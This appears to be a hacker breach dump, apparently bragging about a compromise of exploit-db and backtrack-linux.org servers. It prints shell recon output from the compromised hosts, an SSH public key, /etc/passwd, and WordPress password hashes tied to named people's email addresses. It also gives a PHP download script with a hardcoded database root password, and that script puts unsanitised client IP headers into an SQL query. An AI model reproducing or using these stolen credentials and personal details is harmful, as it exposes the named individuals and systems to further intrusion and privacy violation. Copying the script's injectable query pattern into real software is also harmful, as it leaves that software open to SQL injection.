Oct 18 11:39 .bash_history +-rw-r--r-- 1 emgent emgent 220 Aug 3 11:48 .bash_logout +-rw-r--r-- 1 emgent emgent 3103 Aug 3 11:48 .bashrc +drwx------ 2 emgent emgent 4096 Aug 3 11:49 .cache +drwx------ 2 emgent emgent 4096 Aug 3 11:49 .irssi +-rw------- 1 emgent emgent 9 Aug 3 11:50 .nano_history +-rw-r--r-- 1 emgent emgent 675 Aug 3 11:48 .profile +drwxr-xr-x 2 emgent emgent 4096 Aug 3 11:49 .ssh +drwxr-xr-x 3 emgent emgent 4096 Aug 7 07:45 .subversion +drwxr-xr-x 4 emgent emgent 4096 Aug 7 07:46 exploitdb + + + +$ cd .ssh + +$ ls +authorized_keys +cat authorized_keys +ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAntXlep19oECqVocmK6UIhsxI5yGQSPUVYWOZXWO7Q0wP9vF5FfHmE4yCmKt+MleWcPWkkbI6IXBt9TNtw7m6usPx2IEbpEVr8sl7pT8hiW8tKNew74gEEgE53AGLhWr/+vViL+5K4SKCt591oABDtWA6KIEOuyx9/jqLLwBTQP0UyrqIJpR9VhQ2GQ6tN6Y+LV4tvpqy8ehevsIqdj+HvdsvVU2sREJsSH5xAncaRJQ1sfQepyeAwi7yZ1fBT4U4/LlukkBLIqjXk2D6jPZG870R4KCEI280rBJ9DX4fPX9qvYUwOm/OtWwxC7kivuCnNM1v2wBRUVCBmSUimqWnpQ== emgent@enJoy + +$ ps aux +USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND +root 1 0.0 0.0 23680 1244 ? Ss Nov11 0:07 /sbin/init +root 2 0.0 0.0 0 0 ? S Nov11 0:00 [kthreadd] +root 3 0.0 0.0 0 0 ? S Nov11 0:01 [migration/0] +root 4 0.0 0.0 0 0 ? S Nov11 0:12 [ksoftirqd/0] +root 5 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/0] +root 6 0.0 0.0 0 0 ? S Nov11 0:02 [migration/1] +root 7 0.0 0.0 0 0 ? S Nov11 0:04 [ksoftirqd/1] +root 8 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/1] +root 9 0.0 0.0 0 0 ? S Nov11 0:02 [migration/2] +root 10 0.0 0.0 0 0 ? S Nov11 0:02 [ksoftirqd/2] +root 11 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/2] +root 12 0.0 0.0 0 0 ? S Nov11 0:01 [migration/3] +root 13 0.0 0.0 0 0 ? S Nov11 0:05 [ksoftirqd/3] +root 14 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/3] +root 15 0.0 0.0 0 0 ? S Nov11 0:32 [events/0] +root 16 0.0 0.0 0 0 ? S Nov11 13:44 [events/1] +root 17 0.0 0.0 0 0 ? S Nov11 0:17 [events/2] +root 18 0.0 0.0 0 0 ? S Nov11 0:18 [events/3] +root 19 0.0 0.0 0 0 ? S Nov11 0:00 [cpuset] +root 20 0.0 0.0 0 0 ? S Nov11 0:00 [khelper] +root 21 0.0 0.0 0 0 ? S Nov11 0:00 [netns] +root 22 0.0 0.0 0 0 ? S Nov11 0:00 [async/mgr] +root 23 0.0 0.0 0 0 ? S Nov11 0:00 [pm] +root 25 0.0 0.0 0 0 ? S Nov11 0:02 [sync_supers] +root 26 0.0 0.0 0 0 ? S Nov11 0:04 [bdi-default] +root 27 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/0] +root 28 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/1] +root 29 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/2] +root 30 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/3] +root 31 0.0 0.0 0 0 ? S Nov11 11:09 [kblockd/0] +root 32 0.0 0.0 0 0 ? S Nov11 2:17 [kblockd/1] +root 33 0.0 0.0 0 0 ? S Nov11 1:33 [kblockd/2] +root 34 0.0 0.0 0 0 ? S Nov11 1:14 [kblockd/3] +root 35 0.0 0.0 0 0 ? S Nov11 0:00 [kacpid] +root 36 0.0 0.0 0 0 ? S Nov11 0:00 [kacpi_notify] +root 37 0.0 0.0 0 0 ? S Nov11 0:00 [kacpi_hotplug] +root 38 0.0 0.0 0 0 ? S Nov11 0:00 [ata/0] +root 39 0.0 0.0 0 0 ? S Nov11 0:00 [ata/1] +root 40 0.0 0.0 0 0 ? S Nov11 0:00 [ata/2] +root 41 0.0 0.0 0 0 ? S Nov11 0:00 [ata/3] +root 42 0.0 0.0 0 0 ? S Nov11 0:00 [ata_aux] +root 43 0.0 0.0 0 0 ? S Nov11 0:00 [ksuspend_usbd] +root 44 0.0 0.0 0 0 ? S Nov11 0:00 [khubd] +root 45 0.0 0.0 0 0 ? S Nov11 0:00 [kseriod] +root 46 0.0 0.0 0 0 ? S Nov11 0:00 [kmmcd] +root 51 0.0 0.0 0 0 ? S Nov11 0:00 [khungtaskd] +root 52 0.0 0.0 0 0 ? S Nov11 0:30 [kswapd0] +root 53 0.0 0.0 0 0 ? SN Nov11 0:00 [ksmd] +root 54 0.0 0.0 0 0 ? S Nov11 0:00 [aio/0] +root 55 0.0 0.0 0 0 ? S Nov11 0:00 [aio/1] +root 56 0.0 0.0 0 0 ? S Nov11 0:00 [aio/2] +root 57 0.0 0.0 0 0 ? S Nov11 0:00 [aio/3] +root 58 0.0 0.0 0 0 ? S Nov11 0:00 [ecryptfs-kthrea] +root 59 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/0] +root 60 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/1] +root 61 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/2] +root 62 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/3] +root 65 0.0 0.0 0 0 ? S Nov11 0:00 [pciehpd] +root 66 0.0 0.0 0 0 ? S Nov11 0:00 [scsi_eh_0] +root 67 0.0 0.0 0 0 ? S Nov11 0:00 [scsi_eh_1] +root 69 0.0 0.0 0 0 ? S Nov11 0:00 [kstriped] +root 70 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/0] +root 71 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/1] +root 72 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/2] +root 73 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/3] +root 74 0.0 0.0 0 0 ? S Nov11 0:00 [kmpath_handlerd] +root 75 0.0 0.0 0 0 ? S Nov11 0:00 [ksnapd] +root 76 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/0] +root 77 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/1] +root 78 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/2] +root 79 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/3] +root 80 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/0] +root 81 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/1] +root 82 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/2] +root 83 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/3] +root 191 0.0 0.0 0 0 ? S Nov11 1:03 [mpt_poll_0] +root 192 0.0 0.0 0 0 ? S Nov11 0:00 [mpt/0] +root 268 0.0 0.0 0 0 ? S Nov11 0:00 [scsi_eh_2] +root 285 0.3 0.0 0 0 ? S Nov11 125:09 [jbd2/sda1-8] +root 286 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit] +root 287 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit] +root 288 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit] +root 289 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit] +root 322 0.3 0.0 0 0 ? S Nov11 115:40 [flush-8:0] +root 347 0.0 0.0 16904 640 ? S Nov11 0:00 upstart-udev-bridge --daemon +root 363 0.0 0.0 16920 416 ? S +root 14387 0.0 0.0 0 0 ? Z 15:07 0:00 [firewall-drop.s] +www-data 14407 0.4 0.5 354384 32672 ? S 15:07 0:00 /usr/sbin/apache2 -k start +www-data 14408 0.1 0.4 352604 29276 ? S 15:07 0:00 /usr/sbin/apache2 -k start +www-data 14412 0.3 0.5 354716 32420 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14413 0.4 0.4 352592 29272 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14414 0.2 0.4 352600 28200 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14415 0.3 0.4 352724 29088 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14416 0.2 0.4 353776 29452 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14417 0.2 0.4 353136 28616 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14418 0.3 0.4 353520 29500 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14419 0.7 0.0 0 0 ? Z 15:08 0:00 [apache2] +www-data 14420 0.5 0.5 353976 31084 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14421 0.3 0.4 353252 29180 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14422 0.0 0.1 346724 8076 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14423 0.6 0.5 354352 31720 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14424 0.4 0.4 353808 29848 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14425 0.3 0.4 352584 28252 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14426 0.1 0.1 346748 10564 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14427 0.6 0.4 352976 28944 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14428 0.0 0.1 346724 8204 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14429 0.0 0.1 346724 8196 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14430 0.7 0.4 352976 29032 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14431 0.9 0.4 353668 30120 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14432 0.9 0.4 353368 29668 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14433 0.8 0.4 352976 28836 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14435 1.3 0.4 352716 29364 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14436 1.8 0.4 353736 30320 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14437 0.1 0.1 346236 7760 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14438 0.0 0.0 14976 1116 ? R 15:08 0:00 ps aux +root 19786 0.0 0.0 107420 1884 ? S Nov16 0:00 /usr/bin/svnserve -d -r /var/svn/ +root 19983 0.0 0.0 107420 1940 ? S Nov29 0:00 /usr/bin/svnserve -d -r /var/svn/ +root 19989 0.0 0.0 107420 1884 ? S Nov16 0:00 /usr/bin/svnserve -d -r /var/svn/ +root 20015 0.0 0.0 107420 1884 ? S Nov16 0:00 /usr/bin/svnserve -d -r /var/svn/ +root 20286 0.0 0.0 107420 1888 ? S Nov18 0:00 /usr/bin/svnserve -d -r /var/svn/ +mysql 22394 10.4 24.9 2441860 1529604 ? Ssl Nov12 3357:17 /usr/sbin/mysqld + +$ df -h +Filesystem Size Used Avail Use% Mounted on +/dev/sda1 48G 17G 29G 37% / +none 3.0G 172K 3.0G 1% /dev +none 3.0G 0 3.0G 0% /dev/shm +none 3.0G 56K 3.0G 1% /var/run +none 3.0G 0 3.0G 0% /var/lock +none 3.0G 0 3.0G 0% /lib/init/rw +none 48G 17G 29G 37% /var/lib/ureadahead/debugfs + +Wordpress: +admin:$P$B./Y8qG9A2YuqIz4uBAjFRo.9Yv0Fb1::muts@offsec.com +dookie2000ca:$P$B7YVdu0JG/JOf2YAS8WsmQqHnZHf.b/:dookie2000ca:dookie@exploit-db.com +innrwrld:$P$BaJi4YkAt5o/paWUfDMdOOWuqHx/is/:innrwrld:innrwrld@exploit-db.com +ivan:$P$B/YVWEkaYIq3s2QLSmVB/wvXWYqoM80::centaur.mail@gmail.com +sinn3r:$P$BYzu/ozErhWi8hB8IPFdr6Tv2R9rat/:3r:sinn3r@exploit-db.com +loneferret:$P$Bgsl0.nlu4De51qkI8MDoeHDS6iLcM1:loneferret:loneferret@exploit-db.com +ronin:$P$BFw9OFuWa1s/t5DUJwKO6A0Otfkewo0::ronin@exploit-db.com +dijital1:$P$BirOcybWYDo/Z/wrJ5zBq2zaGElV.f/:dijital1:rlh@ciphermonk.net +emgent:$P$BYiha9WKXDzXQm8A8RXboRc7zZuus0.::emgent@backtrack-linux.org +j0fer:$P$Bgtsc7w.Vb6mCkJfJi7JkSO5zJUEBY.::j0fer@exploit-db.com +ReL1K:$P$B6DyRPNYrBuC.WRv5GrDnFg3wAQPo91::kennedyd013@gmail.com +Xpl0it:$P$BGBdVhFBaUM8s9ooGcmB01t.zoK.0V0::mr.xpl0it@gmail.com +fdiskyou:$P$BlgwWd3EmVg4SsfIxzOjqUQfGKfLZD0:fdiskyou:rui@exploit-db.com +rawjaw:$P$Bovffv59pNKpCOOvKlbGqFOmAh.HKb0::rawjaw@exploit-db.com +djokica:$P$BNeyg6NPYJWO9fzjfZs1okvMiM0vq51::centaur@pavko.info +xxDigiPxx:$P$B2eEGgTNsZnM4DFpIr4kNrKXv.ivyg/:xxdigipxx:xxtwistedpairxx@comcast.net +muts:$P$Bn.MAuG.OlZ1NtTxq0WWAUwhVEfusC.::muts@offensive-security.com +Ryujin:$P$BZ75UnhRqkJZj82bWfXbeD6dVxzXTG0::ryujin@offsec.com +didn0t:$P$BkGM.gSmmmuDlkJUKjCzy1LfUn9AnS.::paul@pizza.org +zelik:$P$BYjCAaqW0tcdNV3MZviRZoN./.HMKn0::tal.zeltzer@gmail.com +bitform:$P$BLk7y3.7JTn12lRYj25A/JXJ1W0SIA1::mattgraeber@gmail.com +bolexxx:$P$B1liji1bDZoOOwnVwV3Aa59Mqux0FC1::bolexxx@offsec.com +h00die:$P$Behl/g/GHQo5zxciUMgjPPzu7ZI8nO/::ragecyr@exploit-db.com +MaXe:$P$B6PKmgTlcm5L5kpysXfksmEmRfMy6U.::MaXe@intern0t.net +marked_doe:$P$By1rR96ByDsyil/yQa79qBE/A7nbOA1:marked_doe:marc@doudiet.net +code0wnz:$P$Bw1OuJHHzMtUBd8oSjmFoQYKtzjaC..:code0wnz:code0wnz@gmail.com +Dr_IDE:$P$BR.ReeHZDabreI8G0D5NARv8oY6SOP/::dr_ide@hushmail.com +Sud0:$P$BqovGmeqOSCzsHFso9q4goSZ4hkWbK1: :Sud0.x90@gmail.com +TecR0c:$P$BXoaJm6vL1VKJWz.K3m1M.XXVoXU9K/::tecr0c@corelan.be +kripthor:$P$BpUEGtZ3PvzfYotKDvvRA1AU9U4.iq1:kripthor:umbelino@crazydog.pt +ryp:$P$BwQ3FGe9q7spL3vkhxTyYMBkL4UGOQ.::adam@rypmarketing.com +fdisk:$P$Blv3X9wG6b/Yo3SDi22/nIJ34t2jGi/::ruifilipe.reis@gmail.com +root-boy:$P$BWq8dOxSe/HKG/kE3cXpGyAOgR6F.n1:root-boy:root-boy@exploit-db.com + +,_._._._._._._._|____________________________________________________ +|_|_|_|_|_|_|_|_|___________________________________________________/ + ~ backtrack ~ ! + +Since we already tapped into exploit-db and their server lies in the +same subnet with backtrack, we decided to check out their mad +security. Backtrack is run by muts, the same guy who also administers +exploit-db, so no wonder why it was super easy to get a shell... + + +$ uname -a +Linux backtrack-linux.org 2.6.32.26-175.fc12.x86_64 #1 SMP Wed Dec 1 21:39:34 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux + +$ id +uid=48(apache) gid=494(apache) groups=494(apache) context=unconfined_u:system_r:httpd_t:s0 + +$ alias ls="ls -la" + +$ ls +total 110 +dr-xr-xr-x. 25 root root 4096 Dec 7 08:42 . +dr-xr-xr-x. 25 root root 4096 Dec 7 08:42 .. +-rw-r--r--. 1 root root 0 Dec 7 08:42 .autofsck +drwx------. 2 root root 4096 Dec 10 03:40 backup +dr-xr-xr-x. 2 root root 4096 Nov 29 19:59 bin +dr-xr-xr-x. 5 root root 1024 Dec 7 08:41 boot +drwxr-xr-x. 17 root root 3580 Dec 7 08:43 dev +drwxr-xr-x. 66 root root 4096 Dec 7 08:42 etc +drwxr-xr-x. 3 root root 4096 Aug 14 20:50 home +dr-xr-xr-x. 9 root root 4096 Aug 11 04:01 lib +dr-xr-xr-x. 9 root root 12288 Nov 29 20:00 lib64 +drwx------. 2 root root 16384 Aug 11 02:01 lost+found +drwxr-xr-x. 2 root root 4096 Aug 11 04:42 maint +drwxr-xr-x. 2 root root 4096 Aug 25 2009 media +drwxr-xr-x. 2 root root 4096 Aug 25 2009 mnt +drwxr-xr-x. 2 root root 4096 Aug 25 2009 opt +dr-xr-xr-x. 160 root root 0 Dec 7 08:42 proc +drwxr-xr-x. 5 root root 4096 Dec 3 17:16 recovery +dr-xr-x---. 4 root root 4096 Dec 10 08:50 root +dr-xr-xr-x. 2 root root 12288 Nov 29 19:59 sbin +drwxr-xr-x. 7 root root 0 Dec 7 08:42 selinux +drwxr-xr-x. 2 root root 4096 Aug 25 2009 srv +drwxr-xr-x. 13 root root 0 Dec 7 08:42 sys +drwxrwxrwt. 4 root root 4096 Dec 10 14:08 tmp +drwxr-xr-x. 14 root root 4096 Aug 11 02:03 usr +drwxr-xr-x. 20 root root 4096 Aug 14 20:45 var + + +$ cat /etc/issue +Fedora release 12 (Constantine) +Kernel \r on an \m (\l) + +$ cat /etc/passwd +root:x:0:0:root:/root:/bin/bash +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin +operator:x:11:0:operator:/root:/sbin/nologin +games:x:12:100:games:/usr/games:/sbin/nologin +gopher:x:13:30:gopher:/var/gopher:/sbin/nologin +ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin +nobody:x:99:99:Nobody:/:/sbin/nologin +vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin +dbus:x:81:81:System message bus:/:/sbin/nologin +mailnull:x:47:497::/var/spool/mqueue:/sbin/nologin +smmsp:x:51:496::/var/spool/mqueue:/sbin/nologin +sshd:x:74:495:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin +apache:x:48:494:Apache:/var/www:/sbin/nologin +mysql:x:27:493:MySQL Server:/var/lib/mysql:/bin/bash +ossec:x:500:500::/var/ossec:/sbin/nologin +ossecm:x:501:500::/var/ossec:/sbin/nologin +ossecr:x:502:500::/var/ossec:/sbin/nologin +ntp:x:38:38::/etc/ntp:/sbin/nologin +tcpdump:x:72:72::/:/sbin/nologin + +$ cd +/var/www/html/ + +$ ls +total 90224 +drwxr-xr-x. 13 apache apache 4096 Dec 9 12:21 . +drwxr-xr-x. 6 root root 4096 Aug 18 10:30 .. +-rw-r--r--. 1 apache apache 4183 Dec 5 16:50 .htaccess +-rw-r--r--. 1 apache apache 1156 Aug 11 03:17 HT +-rw-r--r--. 1 apache apache 2233 Aug 11 03:17 HT-ORIG +-rw-r--r--. 1 apache apache 1526525 Nov 11 14:01 IMG_0585.JPG +drwxr-xr-x. 2 apache apache 4096 Aug 11 03:16 ads +-rw-r--r--. 1 apache apache 125832 Nov 19 12:18 bootsplash.jpg +-rw-r--r--. 1 apache apache 754444 Aug 11 03:16 bt-nsa.png +-rw-r--r--. 1 apache apache 757498 Aug 11 03:16 bt-nsa2.png +-rw-r--r--. 1 apache apache 81597 Aug 11 03:16 bt4-final-vm.zip.torrent +-rw-r--r--. 1 apache apache 60094 Aug 11 03:16 bt4-final.iso.torrent +-rw-r--r--. 1 apache apache 44 Aug 11 03:16 bt4r1.txt +-rw-r--r--. 1 root root 686248 Nov 23 10:47 bt4r2.png +-rw-r--r--. 1 apache apache 160728 Aug 11 03:16 btfail.png +-rw-r--r--. 1 apache apache 476 Aug 11 03:16 collapsible_ad.html +-rwxr-xr-x. 1 apache apache 13397784 Aug 11 03:16 d.bin +-rw-r--r--. 1 apache apache 121 Aug 11 03:16 d.lic +-rw-r--r--. 1 apache apache 12844822 Aug 11 03:16 d32.bin +drwxr-xr-x. 2 apache apache 4096 Aug 11 03:16 documents +-rw-r--r--. 1 apache apache 3342 Aug 11 03:16 down.php +-rw-r--r--. 1 apache apache 4158 Aug 11 03:16 download-orig.php +-rw-r--r--. 1 apache apache 4945 Nov 22 11:38 download.php +-rw-r--r--. 1 apache apache 15125 Aug 11 03:16 error.php +-rw-r--r--. 1 apache apache 137383 Aug 11 03:16 example-2.jpg +-rw-r--r--. 1 apache apache 1150 Aug 11 03:16 favicon.ico +drwxr-xr-x. 21 apache apache 4096 Nov 22 18:56 forums +-rw-r--r--. 1 apache apache 87176 Aug 11 03:17 google.png +-rw-r--r--. 1 apache apache 53 Aug 11 03:17 googled6c4817aa45e0032.html +-rw-r--r--. 1 apache apache 23 Aug 11 03:17 googlehostedservice.html +-rw-r--r--. 1 apache apache 1978856 Sep 17 08:06 hola.jpg +-rw-r--r--. 1 apache apache 2264271 Sep 17 08:12 hola1.jpg +-rw-r--r--. 1 apache apache 2197361 Sep 17 08:15 hola2.jpg +-rw-r--r--. 1 apache apache 315306 Aug 11 03:17 hola22.png +-rw-r--r--. 1 apache apache 169202 Aug 11 03:17 hola23.png +drwxr-xr-x. 8 apache apache 4096 Nov 21 16:38 images +-rw-r--r--. 1 apache apache 3 Aug 11 03:17 index.html +-rw-r--r--. 1 apache apache 397 Dec 9 12:20 index.php +-rw-r--r--. 1 apache apache 321196 Nov 19 15:06 kanji.png +-rw-r--r--. 1 apache apache 147841 Sep 4 12:37 knock-0.5.tar.gz +-rw-r--r--. 1 apache apache 15410 Dec 9 12:20 license.txt +-rw-r--r--. 1 apache apache 48404480 Nov 14 15:53 mediawiki-1.16.0.tar +-rw-r--r--. 1 apache apache 13946 Aug 11 03:17 nv-xorg.conf +-rw-r--r--. 1 apache apache 1382400 Oct 26 10:38 oiopub-direct.tar +-rw-r--r--. 1 apache apache 1508471 Aug 11 03:17 p2270016.jpg +-rw-r--r--. 1 apache apache 1636957 Aug 11 03:17 p2280018.jpg +drwxr-xr-x. 2 apache apache 4096 Nov 22 11:46 patches +-rw-r--r--. 1 apache apache 582 Nov 22 11:21 r2.php +-rw-r--r--. 1 apache apache 9120 Dec 9 12:20 readme.html +-rw-r--r--. 1 apache apache 712 Nov 10 22:27 s.php +-rw-r--r--. 1 apache apache 63 Aug 11 03:17 show.dud.php +-rw-r--r--. 1 apache apache 801 Aug 11 03:17 show.original.php +-rw-r--r--. 1 apache apache 31 Aug 11 03:17 show.php +-rw-r--r--. 1 apache apache 601 Nov 10 22:28 show.stats.working.php +-rw-r--r--. 1 apache apache 38971 Dec 7 23:23 sitemap.xml +-rw-r--r--. 1 apache apache 2485 Dec 7 23:23 sitemap.xml.gz +drwxr-xr-x. 3 apache apache 4096 Aug 11 03:17 slider +-rw-r--r--. 1 apache apache 714372 Aug 11 03:17 spot-the-release.png +-rw-r--r--. 1 apache apache 1536 Aug 11 03:17 stats.php +-rw-r--r--. 1 apache apache 33 Dec 10 03:34 stats.txt +-rw-r--r--. 1 apache apache 23660 Aug 11 03:17 style.css +-rw-r--r--. 1 apache apache 5 Aug 11 03:17 test.php +drwxr-xr-x. 2 apache apache 4096 Nov 22 09:22 torrents +drwxr-xr-x. 15 apache apache 4096 Nov 27 16:52 wiki +-rw-r--r--. 1 apache apache 4391 Dec 9 12:20 wp-activate.php +drwxr-xr-x. 8 apache apache 4096 Dec 5 08:12 wp-admin +-rw-r--r--. 1 apache apache 40284 Dec 9 12:20 wp-app.php +-rw-r--r--. 1 apache apache 220 Dec 9 12:20 wp-atom.php +-rw-r--r--. 1 apache apache 274 Dec 9 12:20 wp-blog-header.php +-rw-r--r--. 1 apache apache 3926 Dec 9 12:20 wp-comments-post.php +-rw-r--r--. 1 apache apache 238 Dec 9 12:20 wp-commentsrss2.php +-rw-r--r--. 1 apache apache 3173 Dec 9 12:20 wp-config-sample.php +-rw-r--r--. 1 apache apache 2696 Nov 22 19:32 wp-config.php +drwxr-xr-x. 9 apache apache 4096 Dec 9 12:21 wp-content +-rw-r--r--. 1 apache apache 1255 Dec 9 12:20 wp-cron.php +-rw-r--r--. 1 apache apache 240 Dec 9 12:20 wp-feed.php +drwxr-xr-x. 8 apache apache 4096 Aug 13 20:06 wp-includes +-rw-r--r--. 1 apache apache 2002 Dec 9 12:20 wp-links-opml.php +-rw-r--r--. 1 apache apache 2441 Dec 9 12:20 wp-load.php +-rw-r--r--. 1 apache apache 26059 Dec 9 12:20 wp-login.php +-rw-r--r--. 1 apache apache 7774 Dec 9 12:20 wp-mail.php +-rw-r--r--. 1 apache apache 487 Dec 9 12:20 wp-pass.php +-rw-r--r--. 1 apache apache 218 Dec 9 12:20 wp-rdf.php +-rw-r--r--. 1 apache apache 316 Dec 9 12:20 wp-register.php +-rw-r--r--. 1 apache apache 218 Dec 9 12:20 wp-rss.php +-rw-r--r--. 1 apache apache 220 Dec 9 12:20 wp-rss2.php +-rw-r--r--. 1 apache apache 9177 Dec 9 12:20 wp-settings.php +-rw-r--r--. 1 apache apache 18695 Dec 9 12:20 wp-signup.php +-rw-r--r--. 1 apache apache 3702 Dec 9 12:20 wp-trackback.php +-rw-r--r--. 1 root root 99665 Nov 24 00:52 wtfff.png +-rw-r--r--. 1 apache apache 85 Nov 20 13:43 x.gif +-rw-r--r--. 1 apache apache 95481 Dec 9 12:20 xmlrpc.php + +$ cat wp-config.php + +$ cat stats.txt +BackTrack 4 - 4916323 downloads + +cat download.php + EVEN IF YOU THINK YOU KNOW WHAT YOU ARE DOING!!! + +function getRealIpAddr() +{ + if (!empty($_SERVER['HTTP_CLIENT_IP'])) //check ip from share internet + { + $ip=$_SERVER['HTTP_CLIENT_IP']; + } + elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) //to check ip is pass from proxy + { + $ip=$_SERVER['HTTP_X_FORWARDED_FOR']; + } + else + { + $ip=$_SERVER['REMOTE_ADDR']; + } + return $ip; +} + +$ip=getRealIpAddr(); + +$username="root"; +$password="234hi2u3d98as7d23kuh"; +$database="counter"; + +function choose($iso) +{ + + $num = Rand (1,5); + switch ($num) + { + case 1: + $link="ftp://ftp.uio.no/pub/security/backtrack/$iso"; + break; + + case 2: + $link="http://ftp.uio.no/pub/security/backtrack/$iso"; + break; + + case 3: + $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso"; + break; + + case 4: + $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso"; + break; + + case 5: + $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso"; + break; + +// case 6: +// $link="http://moon.backtrack-linux.org/downloads/$iso"; +// break; + + + } + + +return $link; + +} + + +$version=$_GET["fname"]; + +if (! (($version=="bt4f") or ($version=="bt4fvm") or ($version=="bt4r1") or ($version=="bt4r1vm") or ($version=="bt3") or ($version=="bt4pf") or ($version=="bt4b") or ($version=="bt4bvm") or ($version=="bt4r2") or ($version=="bt4r2vm"))) + +{ + echo "This page cannot be accessed directly."; + exit; +} + +if ($version=="bt4r2") +{ + + $iso="bt4-r2.iso"; + $link=choose($iso); + +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + + header( "Location: $link "); + exit; +} + + +if ($version=="bt4r2vm") +{ + + $iso="bt4-r2-vm.tar.bz2"; + $link=choose($iso); + +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + + header( "Location: $link "); + exit; +} + + + +if ($version=="bt4f") +{ + + $iso="bt4-final.iso"; + $link=choose($iso); + +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + + header( "Location: $link "); + exit; +} + +elseif ($version=="bt4fvm") +{ + $iso="bt4-final-vm.zip"; + $link=choose($iso); + +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + + header( "Location: $link "); + exit; +} + +elseif ($version=="bt4r1") +{ + $iso="bt4-r1.iso"; + $link=choose($iso); + +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + + header( "Location: $link "); + exit; +} + +elseif ($version=="bt4r1vm") +{ + $iso="bt4-r1-vm.tar.bz2"; + $link=choose($iso); + +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + + header( "Location: $link "); + exit; +} + +elseif ($version=="bt4pf") +{ + $iso="bt4-pre-final.iso"; + $link=choose($iso); + +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + + header( 